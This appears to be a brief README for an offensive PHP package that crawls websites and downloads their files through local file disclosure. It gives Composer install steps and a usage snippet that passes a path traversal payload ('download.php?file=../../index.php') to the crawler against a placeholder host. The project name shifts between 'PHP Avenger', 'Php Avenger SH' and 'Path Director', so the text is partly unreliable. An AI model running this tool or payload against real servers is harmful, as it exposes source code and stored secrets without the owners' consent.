ASZone - Crawler - Reading Static File
Reading Static File is a open source tool for reading static file / Path Director
The recommended way to install PHP Avenger is through Composer.
# Install Composer
curl -sS https://getcomposer.org/installer | php
Next, run the Composer command to install the latest beta version of Php Avenger SH:
php composer.phar require aszone/crawler/download-file-by-lfd
$command=array();
$crawler = new DownloadByLocalFileDownload($command);
$url="http://www.xxxx.com/download.php?file=../../index.php";
$crawler->getAllFiles($url);